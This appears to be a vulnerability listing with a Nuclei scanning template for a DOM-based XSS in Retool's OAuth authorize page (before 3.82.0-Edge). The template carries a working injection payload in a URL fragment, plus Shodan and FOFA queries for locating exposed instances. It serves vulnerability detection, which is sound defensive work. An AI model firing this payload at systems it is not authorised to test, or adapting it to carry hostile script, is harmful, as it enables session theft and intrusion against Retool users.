漏洞描述
Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.
retool-dom-xss: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS
PoC代码[已公开]
id: retool-dom-xss
info:
name: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.
metadata:
verified: true
max-request: 1
shodan-query: title:"Retool"
fofa-query: body="Retool"
tags: headless,retool,dom,xss,vuln
variables:
random_int: '{{rand_int(1,1000)}}'
headless:
- steps:
- args:
url: '{{BaseURL}}/oauth/authorize#%7B%20"redirectUri":%20"zzz",%20"resourceId":%20"fff",%20"resourceName":%20"aa",%20"resourceType":%20"azz",%20"userEmail":%20"aaa@aa.com",%20"userFirstName":%20"zzz",%20"userLastName":%20"zzff",%20"xsrfToken":%20"x","subdomain":"aaa<svg/onload=prompt({{random_int}})>aaaa","accessToken":"ab"%20%7D'
action: navigate
- action: waitdialog
name: subdomain_object_dom
matchers-condition: and
matchers:
- type: dsl
dsl:
- subdomain_object_dom == true
- subdomain_object_dom_message == random_int
condition: and
# digest: 4a0a004730450220375cc5585e3a9a5a81cad09966c0340935d0c7602b3dc821d10960552208dbcb022100fdfbb3666b81360848d2d9636e59a2d6135be7fe0e941b74dccd0d1e3ee77cdd:922c64590222798bb761d5b6d8e72950